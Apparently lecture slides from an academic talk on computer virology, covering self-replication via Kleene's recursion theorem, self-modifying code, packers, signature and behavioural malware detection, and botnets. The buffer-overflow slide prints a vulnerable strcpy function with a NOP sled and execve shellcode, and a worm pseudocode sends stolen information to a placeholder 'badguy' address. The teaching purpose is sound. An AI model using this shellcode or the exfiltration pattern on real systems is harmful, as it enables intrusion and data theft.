An introduction to Computer Virology

Jean-Yves Marion, LORIA, INPL - ENSMN

Wednesday 23 February 2011

Some great stories

• Stuxnet

• Waledac, a botnet

• GhostNet


What is malware?

• Malware is a program with malicious intent

• Malware can be a virus, a worm, spyware, a botnet, ...

• Giving a mathematical definition is difficult

• However, formal definitions are necessary in order to make progress


How do malware infections work?

Social engineering

Vulnerabilities

Infections

Mutations


Vulnerabilities: a buffer overflow

#include <string.h>

void vulnerable(char *user_data) {
    char buffer[4];
    /* no bounds check: more than 3 characters overflow buffer */
    strcpy(buffer, user_data);
}

[Figure: stack layout showing buffer, the saved EBP, and the saved EIP (return address)]

vulnerable(«AAAAAAAAAAAAAAAA
            \xec\xf2\xff\xbf
            \x90\x90 ... \x90\x90   (a long run of \x90 NOP bytes)
            \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)

[Figure: memory between addresses E000 and FFF0 filled with \x90 NOP bytes]


return at the address FFF0
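
The overwrite of the return address can be illustrated with a toy model. The sketch below is only a simulation in Python, not real memory: the frame layout (4-byte buffer, then saved EBP, then saved EIP), the helper names, and the initial register values are assumptions made for the illustration, and NUL termination is ignored.

```python
import struct

BUF_SIZE = 4  # same size as buffer[4] in the C example


def make_frame(saved_ebp: int, saved_eip: int) -> bytearray:
    """Build a toy frame: buffer | saved EBP | saved EIP (little-endian)."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, saved_eip)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy all of data starting at the buffer, with no bounds check."""
    frame[0:len(data)] = data


def bounded_copy(frame: bytearray, data: bytes) -> None:
    """Copy at most BUF_SIZE bytes, so nothing past the buffer is touched."""
    chunk = data[:BUF_SIZE]
    frame[0:len(chunk)] = chunk


def saved_eip(frame: bytearray) -> int:
    """Read back the saved return address from the toy frame."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


# 8 filler bytes cover the buffer and saved EBP; the next 4 land on saved EIP.
payload = b"A" * 8 + struct.pack("<I", 0xFFF0)

frame = make_frame(saved_ebp=0xBFFFF300, saved_eip=0x08048456)
unchecked_copy(frame, payload)
print(hex(saved_eip(frame)))  # 0xfff0
```

With `bounded_copy` in place of `unchecked_copy`, the saved return address keeps its original value in this model.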


Bugs

• Data are programs

• Bugs are doors if they are exploitable

• A bug-free system is safe

0-day exploits

Bug-free does not exist

• A buffer overflow transforms a program into a self-modifying program


Protections: Self-Modification and Obfuscation

• Many malware families use home-made obfuscations, such as packers, to protect their binaries, following a standard model.

• The obfuscation mechanism is automatically modified for each new distributed binary.

[Figure: "The context": the original binary, with its original entry point (OEP), wrapped by unpacking code that holds the entry point (EP)]

Source: Tripoux: Reverse-engineering of malware packers for dummies, DeepSec 2010

• For a human analyst, obfuscated code is very hard to understand


Win32.Swizzor Packer

Problem 2: Amount of Information

Source: Tripoux: Reverse-engineering of malware packers for dummies, DeepSec 2010


• For a human analyst, obfuscated code is very hard to understand, because not all lines of code are meaningful and because x86 semantics are very tricky.

• One problem is the absence of high-level abstractions to structure and understand obfuscated code.


What is malware?

• Infect systems by self-replication

• Mutation

• Protect itself

• Obfuscation

• Self-modification

• Detection

• Undecidable

Why trace? (1/3)

Definition: binary analysis is

• program analysis

• where the program is unknown

⟹ we only have a binary blob

Reasons:

• indirect jumps ⟹ undecidable control flow

• indirect reads/writes ⟹ undecidable data flow

• self-modifying code ⟹ undecidable syntax


Outline

• Self-replication

• Self-modification

• Detection

• Morphological detection

• Behavioral detection

• Botnet neutralization


Foundation 1 : Self-Replication


Self-replicating cellular automata

Von Neumann (1952), Burks

Codd, Langton


Cohen’s formalization (1985)

[Outline of the embedded slides «Recursion theorems as a foundation of computer virology»: Viruses and worms; ILoveYou; State of the art; A more abstract approach; Abst Virology; Weak recursion; Blueprint Distributions; Strong recursion; External polymorphism; Extended recursion; fixed polymorphism; Explicit recursion; Internal polymorphism; Reproduction through vectors; Detection; Conclusion]

Cohen’s Virus (1985)

• Consider a Turing machine M

• and a viral set V

• When a TM M reads v ∈ V, M produces v′ ∈ V

• (M, V) is a description of a virus

[Figure: a tape holding v1 v2 ... vn, followed by v′1 v′2 ... v′m]


Self-Replication

• A virus has self-replicating capacity

• Reflexive properties of programming languages

• Fixed point combinators (functional programming languages)

• Pointer mechanism to program code: $0 in shell scripts

• Program encoding (Ken Thompson, «Reflections on Trusting Trust», CACM 1984)

• Computability: recursion theorem of Kleene (1938)
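
As a harmless illustration of the fixed point combinators mentioned above, here is a minimal sketch in Python. The names `Z`, `fact_step`, and `factorial` are chosen for the example; the Z combinator is used rather than Y because Python evaluates arguments eagerly.

```python
# Z combinator: a fixed-point combinator that terminates under eager evaluation.
Z = lambda f: (lambda x: f(lambda v: x(x)(v)))(lambda x: f(lambda v: x(x)(v)))

# A non-recursive step function: "rec" stands for the function being defined.
fact_step = lambda rec: lambda n: 1 if n == 0 else n * rec(n - 1)

# factorial is a fixed point of fact_step: it never refers to itself by name.
factorial = Z(fact_step)

print(factorial(5))  # 120
```

The point of the sketch is that recursion, and hence self-reference, is obtained without any name referring to itself.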


A worm X scenario:

• Through social engineering, the victim opens an email attachment

• X scans for information

• X extracts a list of email addresses of targeted people

• X sends a copy of itself by email

A compilation point of view


WormX(v, out) {
  info := extract(out);      // extract information
  send(«badguy», info);      // send information
  @bk := findAddress(out);   // find email address
  send(@bk, v);              // send worm X to @bk
}

Worm X specification

How to compile Worm X?


Semantics and fixed point equations


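Semantics

$\llbracket \_ \rrbracket : \mathrm{Programs} \times D^* \to D^*$

where a value of $D^*$ is a system environment.

From the above example

$\llbracket \mathtt{send} \rrbracket(\mathtt{spider@man.com}, \text{``Hello''}, Out) = \mathtt{cons}(\mathtt{cons}(\mathtt{spider@man.com}, \text{``Hello''}), Out)$

where Out is an output stream.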
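
The semantics of send can be mimicked in a few lines of Python. This is only a sketch: representing cons cells as pairs and nil as `None` is an assumption made for the illustration.

```python
def cons(head, tail):
    """A cons cell is modeled as a (head, tail) pair; None plays the role of nil."""
    return (head, tail)


def send(address, message, out):
    """Push the pair (address, message) in front of the output stream out."""
    return cons(cons(address, message), out)


out = None  # empty output stream
out = send("spider@man.com", "Hello", out)
print(out)  # (('spider@man.com', 'Hello'), None)
```

The system environment is never mutated in place: each call returns a new output stream, which matches the functional reading of the semantics.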

I Always Love You

Suppose that out is a system entry point. A specification of ILoveYou is:

love(v, out) {
  info := find(out);                               // find information
  out := send(cons(“badguy@dom.com”, nil), info);
  @bk := extract(out);                             // extract addresses
  out := send(@bk, v);                             // send virus to @bk
  return out;
}

Semantics: v should behave as ILoveYou if:

$\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$

We have to solve a fixed point equation:

W is a worm satisfying the specification WormX


Kleene’s recursion theorem

A general solution to fixed point equations is given by

Theorem (Kleene (1938)). If p is a program, then there is a program e such that

$\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$

A solution of the ILoveYou equation

$\llbracket v \rrbracket(out) = \llbracket love \rrbracket(v, out)$

Set v = e where p = love.
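
The construction behind the theorem can be tried on a harmless example. The sketch below is an assumption-laden illustration, not the proof: programs are Python source texts, `fixed_point` and `run` are names invented here, and p is an arbitrary two-argument function that only measures the text of e.

```python
def fixed_point(p_name: str) -> str:
    """Return source text e such that run(x), as defined by e, equals p(e, x).

    p_name is the name under which p is visible when e is executed.
    """
    template = (
        "template = {t!r}\n"
        "source = template.format(t=template, p={p!r})\n"
        "def run(x):\n"
        "    return globals()[{p!r}](source, x)\n"
    )
    return template.format(t=template, p=p_name)


def p(e: str, x: int):
    """An arbitrary program with two inputs: a program text e and a value x."""
    return (len(e), x + 1)


e = fixed_point("p")
env = {"p": p}
exec(e, env)  # execute program e in an environment where p is defined

print(env["source"] == e)          # True: e rebuilds its own text
print(env["run"](41) == p(e, 41))  # True: e behaves like p applied to e itself
```

Program e first reconstructs its own source text, then hands it to p, which is exactly the shape of the equation in the theorem.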

Kleene fixed point is a solution of

$\llbracket W \rrbracket(out) = \llbracket WormX \rrbracket(W, out)$

Self-replicating malware compiler:

There is Comp such that for all worm spec:

$\llbracket Comp \rrbracket(Worm) = W$

$\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(W, out)$


Self-replicating compilers with mutations

If p is a program, then there is a program e such that:

$\llbracket e \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(e), out)$

where Mutate is a code mutation procedure

Self-replicating compiler with mutations:

There is Comp such that for every worm and mutation procedure:

$\llbracket Comp \rrbracket(Worm) = W$

$\llbracket W \rrbracket(out) = \llbracket Worm \rrbracket(Mutate(W), out)$

Some historical facts

• 1983: the first official virus, on Vax-PDP 11

• 1988: the first worm, which infects 6000 machines

• 1990: Dark Avenger mutation engine (Bulgaria)

• 1995: macro virus

• 2000: worm “I Love You”

• 2001: Palm Pilot virus

• 2004: cell phone viruses


References

• PhD thesis of F. Cohen

• L. Adleman (1988), who coined the word «virus»

• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)

A Virus is a Virus, Lwoff


Foundation 2 : Self-modification


A simple self-modification

A simple decryption loop

[Figure: a decryption loop ending with jnz @b; labels: Wave 1, Wave 2, n, n + 1]


Another example of self-modification

Proxy = {
  X := Read();
  eval(X);
}

An external input is run

An interpreter of a known or unknown language is used to execute some data


Applications of self-modifying programs

• Malware mutations

• Code protection (digital rights)

• Compression and packers

• Just in Time compilers


Analyzing self-modifying programs

• Complex to design and to analyze

• Program flow may change

• Usually in semantics, program and data are separated: the semantics $P \mapsto \llbracket P \rrbracket$ is defined by structural induction on P

• Axiomatic semantics by means of Hoare logic and separation logic (Myreen, and Cai-Appel et al.)


Dynamic analysis of self-modifying programs

• Instrument a program

• Monitor memory reads (R), memory writes (W), and memory execution (X)

• We follow nested self-modifications

• We detect some code protection

• We detect code patterns

• code decryption

• Integrity checking

• ....


ACProtect: Example (3/5)

• hostname packed with ACProtect


Themida: Example (4/5)

• hostname packed with Themida


Experiments with TraceSurfer: experimental results 1/3

• Number of code waves detected over the whole set of binaries
  ◦ max: 56 waves

95,613 binaries, 80% success rate, 1,400 binaries/h

TraceSurfer based on Pin (Intel)


Typing systems

• each memory cell m at step x has a level Exec(m,x), Read(m,x), Write(m,x)

• if we execute an instruction at address m:

Exec(m,x+1) = Write(m,x)+1

• if the instruction at address m reads memory address m’

Read(m’,x+1) = Exec(m,x)

• If the instruction at address m writes memory address m’

Write(m’,x+1) = Exec(m,x)
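
The level rules can be replayed on a recorded trace. The following Python sketch is an illustration under stated assumptions: the event format ("X", "R", "W" tuples), the function name `wave_levels`, and the sample addresses are invented here, and a write is assumed to propagate the execution level of the writing instruction, Exec(m,x), since otherwise levels would never grow.

```python
from collections import defaultdict


def wave_levels(trace):
    """Replay a trace and return the (exec, read, write) level of each address.

    Events: ("X", m) executes address m; ("R", m, m2) and ("W", m, m2) mean
    the instruction at m reads or writes address m2. All levels start at 0.
    """
    exec_lv = defaultdict(int)
    read_lv = defaultdict(int)
    write_lv = defaultdict(int)
    for event in trace:
        kind, m = event[0], event[1]
        if kind == "X":
            exec_lv[m] = write_lv[m] + 1
        elif kind == "R":
            read_lv[event[2]] = exec_lv[m]
        elif kind == "W":
            # Assumption: the written cell inherits the writer's execution level.
            write_lv[event[2]] = exec_lv[m]
    return exec_lv, read_lv, write_lv


trace = [
    ("X", 0x1000),          # original code runs: wave 1
    ("W", 0x1000, 0x2000),  # it writes (e.g. decrypts) a cell at 0x2000
    ("X", 0x2000),          # the written cell is executed: wave 2
    ("W", 0x2000, 0x3000),
    ("X", 0x3000),          # wave 3
]
exec_lv, _, _ = wave_levels(trace)
print(max(exec_lv.values()))  # 3
```

The highest execution level reached is the number of code waves observed in the trace.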


Related works

• TraceSurfer, based on Pin (Intel)

• Bitblaze (Berkeley) : TEMU, VINE, ...

• DynamoRIO, Ether, Metasm


Malware detection


Traditional malware detection

• A signature is a regular expression denoting a sequence of bytes

Worm.Y: «Your mac is now under our control !»

• Signature : «Your * is now under our control»

• Signatures are constructed quasi-manually

• Vulnerable to code mutations and code obfuscations

• Because they are based on a low (machine code) abstraction level
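
A byte-level signature of this kind, and its weakness, can be sketched with Python's `re` module. The sample byte strings and the single-byte XOR used as a stand-in for a code mutation are assumptions made for the illustration.

```python
import re

# The wildcard "*" of the signature is written ".*" in regular expression syntax.
SIGNATURE = re.compile(rb"Your .* is now under our control")


def matches(binary: bytes) -> bool:
    """Return True if the byte signature occurs anywhere in the binary."""
    return SIGNATURE.search(binary) is not None


original = b"\x90\x90Your mac is now under our control !\x00"
variant = b"\x90\x90Your pc is now under our control !\x00"
# A trivial re-encoding of every byte: same content, different byte sequence.
mutated = bytes(b ^ 0x2A for b in original)

print(matches(original), matches(variant), matches(mutated))  # True True False
```

The wildcard covers the variant, but any re-encoding of the bytes escapes the signature, which is the vulnerability stated in the list above.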


Morphological analysis in a nutshell

Signatures are abstract flow graphs

Detection: search for a signature subgraph in the abstract flow graph of the program
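
Subgraph detection can be sketched with a naive backtracking search. This is not the detector described in the talk: the node labels ("inst", "jcc", "call", "ret"), the function name `find_subgraph`, and the tiny graphs are assumptions for the illustration, and a real detector would need a far more efficient algorithm.

```python
def find_subgraph(sig_labels, sig_edges, prog_labels, prog_edges):
    """Return a mapping signature node -> program node, or None.

    The mapping is injective, preserves node labels, and sends every
    signature edge to a program edge.
    """
    sig_nodes = list(sig_labels)
    prog_edge_set = set(prog_edges)

    def extend(mapping):
        if len(mapping) == len(sig_nodes):
            return dict(mapping)
        s = sig_nodes[len(mapping)]
        for p in prog_labels:
            if p in mapping.values() or prog_labels[p] != sig_labels[s]:
                continue
            mapping[s] = p
            # Check every signature edge whose two endpoints are already mapped.
            consistent = all(
                (mapping[a], mapping[b]) in prog_edge_set
                for a, b in sig_edges
                if a in mapping and b in mapping
            )
            if consistent:
                found = extend(mapping)
                if found is not None:
                    return found
            del mapping[s]
        return None

    return extend({})


program = {0: "inst", 1: "jcc", 2: "call", 3: "inst", 4: "ret"}
program_edges = [(0, 1), (1, 2), (1, 3), (2, 4), (3, 4)]
signature = {"a": "jcc", "b": "call", "c": "ret"}
signature_edges = [("a", "b"), ("b", "c")]

print(find_subgraph(signature, signature_edges, program, program_edges))
# {'a': 1, 'b': 2, 'c': 4}
```

Because the match is on the shape of the graph rather than on bytes, inserting unrelated instructions elsewhere in the program does not hide the signature.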


Automatic construction of signatures


Reduction of signatures by graph rewriting


Morphological detection : Results

• False negative

• No experiment on unknown malware

• Signatures with < 18 nodes are potential false negatives

• Restricted signatures of 20 nodes are efficient

• Less than 3 sec. for signatures of 500 nodes


Conclusion about morphological detection

• Benchmarks are good

• Pro

• More robust on local mutation and obfuscation

• Detect easily variants of the same malware family

• Try to take into account program semantics

• Quasi-automatic generation of signatures

• Cons

• Difficult to determine statically the flow graph of self-modifying programs

• Use of combination of static and dynamic analysis


Reference

• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.


Behavioral analysis

• Monitor program interactions (sys calls, network calls, ...)

• Detection of program behavior from execution traces

• Functionalities are expressed at a high level

Trace automata


• Trace language of a program: generally undecidable.

• Approximation by a regular language: using trace collection or static analysis.

⟹ A trace automaton is a finite-state approximation of some trace language.

[Figure: trace automaton whose transitions are labeled GetLogicalDriveStrings, GetDriveType, FindFirstFile, FindNextFile, and IcmpSendEcho]

• Information leak can be detected

• Static and dynamic analysis
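
A trace automaton can be sketched as a small deterministic automaton over API call names. The states and transitions below are hypothetical: they reuse call names from the figure, but the exact shape of the automaton on the slide is not recoverable, so this is an assumed example rather than the one shown.

```python
# Hypothetical transition table: (state, API call) -> next state.
TRANSITIONS = {
    ("q0", "GetLogicalDriveStrings"): "q1",
    ("q1", "GetDriveType"): "q2",
    ("q2", "GetDriveType"): "q2",
    ("q2", "FindFirstFile"): "q3",
    ("q3", "FindNextFile"): "q3",
}
ACCEPTING = {"q3"}


def accepts(trace, start="q0"):
    """Return True if the sequence of API calls is recognized by the automaton."""
    state = start
    for call in trace:
        state = TRANSITIONS.get((state, call))
        if state is None:
            return False  # no transition: the trace leaves the language
    return state in ACCEPTING


scan = [
    "GetLogicalDriveStrings",
    "GetDriveType",
    "FindFirstFile",
    "FindNextFile",
    "FindNextFile",
]
print(accepts(scan))                               # True
print(accepts(["GetDriveType", "FindFirstFile"]))  # False
```

The automaton accepts infinitely many traces (any number of FindNextFile calls), which is what makes it a finite-state approximation of a trace language.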


Some works on behavioral analysis

• Martignoni et al., 2008, on multi-layered abstraction

• Jacob et al., 2009, on low-level functionalities but exponential-time detection

• Beaucamps, Gnaedig, Marion, RV 2010, on fast detection of high level functionalities.


Botnets

• Understanding malware at the network level, with the interaction between thousands of infected hosts.

• Reverse-engineering

• Provides a starting point for understanding a botnet (protocol, objective, ...)

• Simulation and analytical modeling

• Large scale experiments in vitro


Botnet neutralisation in the lab

[Figure: attack scenario, showing an attacker, spammers, repeaters, protectors, and a WHITE C&C; the counts on the figure are not recoverable]


Spam sent by the botnet


Rlist infections for repeaters


Conclusions


Conclusion

• Mathematical definitions of malware with tools

• High level representation of binaries

• Abstract signatures that are robust with respect to obfuscation

• Experiments and theories

• Analyzing tools combining static and dynamic analysis

• Detection and neutralization heuristics


High Security Lab @ Nancy

lhs.loria.fr

Telescope & honeypots

In vitro experiment clusters


Thanks!